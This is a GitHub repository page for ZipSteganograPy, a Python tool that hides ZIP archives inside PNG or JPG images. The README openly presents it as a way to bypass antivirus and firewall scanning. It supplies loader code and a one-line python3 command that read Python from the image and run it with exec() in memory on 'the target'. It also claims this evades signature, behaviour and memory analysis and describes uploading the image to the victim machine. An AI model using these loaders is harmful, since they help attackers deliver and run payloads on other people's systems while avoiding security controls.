Skip to content

mauricelambert/ZipSteganograPy

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits

ZipSteganograPy.egg-info

ZipSteganograPy.egg-info

 
 

demo

demo

 
 

BypassAntivirus_Stegano.PNG

BypassAntivirus_Stegano.PNG

 
 

LICENSE.txt

LICENSE.txt

 
 

MANIFEST.in

MANIFEST.in

 
 

PKG-INFO

PKG-INFO

 
 

README.md

README.md

 
 

ZipSteganograPy.py

ZipSteganograPy.py

 
 

demo.png

demo.png

 
 

demo1.png

demo1.png

 
 

setup.cfg

setup.cfg

 
 

setup.py

setup.py

 
 

Repository files navigation

ZipSteganograPy logo

ZipSteganograPy

Description

This tool hides a ZIP archive in an image.

This tool is useful for bypassing antivirus and firewall scanning.

Requirements

This package require:

  • python3
  • python3 Standard Library

Installation

pip install ZipSteganograPy

Usages

# Hide a ZIP archive in an image:
python3 ZipSteganograPy.py -z archive.zip -o stegano -i image.png
python3 ZipSteganograPy.pyz -z archive.zip -o stegano -i image.jpg

# Create a ZIP archive (with 3 text files) and hide it in an image:
python3 -m ZipSteganograPy -f file1.txt file2.txt file3.txt -i image.jpg
ZipSteganograPy -f file1.txt file2.txt file3.txt -i image.png

# Easily extract the hidden archive using python3 and its standard library:
python3 -m zipfile -l stegano.png            # list files
python3 -m zipfile -e stegano.jpg output/    # extract

# Easily extract the hidden archive using unzip package:
unzip stegano.jpg -l                         # list files
unzip stegano.jpg -d output/                 # extract

Bypass AV signature

This example load a python code from an image and execute it without writing it on the disk.

This method bypass:

  • basic anti-virus analyze based on signatures of files written on the disk
  • behavior module
  • process memory analyze
from zipfile import ZipFile
with ZipFile("stegano.png", "r") as f:
    for filename in f.namelist():
        exec(f.read(filename).decode())

Demonstration

On your computer:

ZipSteganograPy -f hello.py -i ZipSteganograPy_small.png
# ZipSteganograPy  Copyright (C) 2022  Maurice Lambert
# This program comes with ABSOLUTELY NO WARRANTY.
# This is free software, and you are welcome to redistribute it
# under certain conditions.

# New image 'stegano.png' created from 'ZipSteganograPy_small.png' with hidden ZIP archive.

Upload the stegano.png file on the target (the zip file will probably not anlyze by firewalls because the file will be detected as a correct image).

On the target (unzip from image and execute your python code without writing it on the disk):

from zipfile import ZipFile
with ZipFile("stegano.png", "r") as f:
    for filename in f.namelist():
        exec(f.read(filename).decode())
import zipfile;f=zipfile.ZipFile("stegano.png", "r");[exec(f.read(filename).decode()) for filename in f.namelist()]
python3 -c 'import zipfile;f=zipfile.ZipFile("stegano.png", "r");[exec(f.read(filename).decode()) for filename in f.namelist()]'

Proof

Bypass AV proof

Working proof

Working proof

Links

Licence

Licensed under the GPL, version 3.

About

This tool hides a ZIP archive in an image.

Topics

image zip firewall python3 archive steganography bypass bypass-antivirus pypi-package

Resources

Readme

License

GPL-3.0 license
Activity

Stars

1 star

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages